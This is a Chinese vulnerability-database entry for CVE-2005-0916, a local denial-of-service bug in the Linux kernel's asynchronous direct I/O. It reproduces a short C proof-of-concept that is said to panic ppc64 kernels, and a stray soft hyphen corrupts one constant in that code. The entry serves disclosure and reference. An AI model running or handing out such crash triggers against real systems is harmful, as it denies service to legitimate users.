Linux Kernel本地拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108611 漏洞类型 其他
发布时间 2005-04-04 更新时间 2006-09-05
CVE编号 CVE-2005-0916 CNNVD-ID CNNVD-200505-150
漏洞平台 Linux CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/911
https://www.securityfocus.com/bid/12987
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-150
|漏洞详情
LinuxKernel中存在本地拒绝服务漏洞。漏洞的起因是应用程序无法正确的管理输入/输出资源。本地攻击者可能利用这个漏洞导致受影响的LinuxKernel占用大量CPU时间,造成对合法用户的拒绝服务。
|漏洞EXP
//
// Proof of Concept by Daniel McNeil
// compile using cc -o aiodio_read aiodio_read.c -laio
//

#define _XOPEN_SOURCE 600 
#define _GNU_SOURCE 


#include <unistd.h> 
#include <stdlib.h> 
#include <stdio.h> 
#include <string.h> 
#include <errno.h> 
#include <sys/fcntl.h> 
#include <sys/mman.h> 
#include <sys/wait.h> 
#include <sys/stat.h> 


#include <libaio.h> 


int pagesize; 
char *iobuf; 
io_context_t myctx; 
int aio_maxio = 4; 


/* 
* do a AIO DIO write 
*/ 
int do_aio_direct_read(int fd, char *iobuf, int offset, int size) 
{ 
struct iocb myiocb; 
struct iocb *iocbp = &myiocb; 
int ret; 
struct io_event e; 
struct stat s; 


io_prep_pread(&myiocb, fd, iobuf, size, offset); 
if ((ret = io_submit(myctx, 1, &iocbp)) != 1) { 
perror("io_submit"); 
return ret; 
} 


ret = io_getevents(myctx, 1, 1, &e, 0); 


if (ret) { 
struct iocb *iocb = e.obj; 
int iosize = iocb->u.c.nbytes; 
char *buf = iocb->u.c.buf; 
long long loffset = iocb->u.c.offset; 


printf("AIO read of %d at offset %lld returned %d\n", 
iosize, loffset, e.res); 
} 


return ret; 



} 


int main(int argc, char *argv[]) 
{ 
char *filename; 
int fd; 
int err; 

filename = "test.aio.file"; 
fd = open(filename, O_RDWR|O_DIRECT|O_CREAT|O_TRUN­C, 0666); 


pagesize = getpagesize(); 
err = posix_memalign((void**) &iobuf, pagesize, pagesize); 
if (err) { 
fprintf(stderr, "Error allocating %d aligned bytes.\n", 
pagesize); 
exit(1); 
} 
err = write(fd, iobuf, pagesize); 
if (err != pagesize) { 
fprintf(stderr, "Error ret = %d writing %d bytes.\n", 
err, pagesize); 
perror(""); 
exit(1); 
} 
memset(&myctx, 0, sizeof(myctx)); 
io_queue_init(aio_maxio, &myctx); 
err = do_aio_direct_read(fd, iobuf, 0, pagesize); 
close(fd); 


printf("This will panic on ppc64\n"); 
return err; 

}

// milw0rm.com [2005-04-04]
|受影响的产品
SuSE Linux Enterprise Server 9 S.u.S.E. Novell Linux Desktop 9.0 S.u.S.E. Linux Professional 9.3 x86_64 S.u.S.E. Linux Professional 9.3 S.u.S.E. Linux Professional 9.2 x86_64
|参考资料

来源:linux.bkbits.net:8080
链接:http://linux.bkbits.net:8080/linux-2.6/cset%404248c8c0es30_4YVdwa6vteKi7h_nw
来源:MISC
链接:http://groups-beta.google.com/group/linux.kernel/browse_thread/thread/13b43bd5783842f6/7ce3c5a514a497ab?q=io_queue_init&rnum=3#7ce3c5a514a497ab
来源:BID
名称:12987
链接:http://www.securityfocus.com/bid/12987
来源:SUSE
名称:SUSE-SA:2005:050
链接:http://www.novell.com/linux/security/advisories/2005_50_kernel.html